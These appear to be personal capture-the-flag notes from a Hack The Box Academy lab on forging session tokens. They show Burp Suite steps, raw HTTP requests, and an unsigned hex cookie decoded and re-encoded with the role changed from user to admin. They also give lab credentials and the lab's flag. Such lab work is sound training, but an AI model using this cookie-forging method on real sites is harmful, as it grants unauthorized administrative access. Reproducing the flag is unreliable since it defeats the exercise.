TAMPERING/FORGING SESSION TOKENS

#identify the token's pattern or encoding
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input

BURP > Proxy
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 83.136.254.158:52415
  Origin: http://83.136.254.158:52415
  Content-Type: application/x-www-form-urlencoded
  Referer: http://83.136.254.158:52415/index.php

  username=htb-stdnt&password=AcademyStudent%21
  
 * send to repeater

#send multiple login requests and take note of the session tokens assigned
#try to identify the pattern, or whether only a portion of the token is random
BURP > Repeater
 Request
 ...
  POST /index.php HTTP/1.1
  Host: 94.237.61.84:50122
  Origin: http://94.237.61.84:50122
  Referer: http://94.237.61.84:50122/

  username=htb-stdnt&password=AcademyStudent%21
 Response
 ...
  HTTP/1.1 302 Found
  Date: Thu, 26 Dec 2024 00:29:27 GMT
  Server: Apache/2.4.59 (Debian)
  Set-Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572
  Location: /admin.php
  ...

root@oco:~$ echo -n 757365723d6874622d7374646e743b726f6c653d75736572 | xxd -r -p
 user=htb-stdnt;role=user
#tamper with / forge the token: it decodes to plain hex with nothing else alongside it (no signature or encryption), so the role field is not integrity-protected
root@oco:~$ echo -n 'user=htb-stdnt;role=admin' | xxd -p
 757365723d6874622d7374646e743b726f6c653d61646d696e
 
#log in again while the current session is still active/attached or cached
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 username field: htb-stdnt
 password field: AcademyStudent!
 * submit the expected user input
 
BURP > Proxy
 Request
 ...
  GET / HTTP/1.1
  Host: 94.237.61.84:50122
  Cookie: session=757365723d6874622d7374646e743b726f6c653d75736572

 * right-click on the request > Do intercept > Response to this request
 * HTB{d1f5d760d130f7dd11de93f0b393abda}
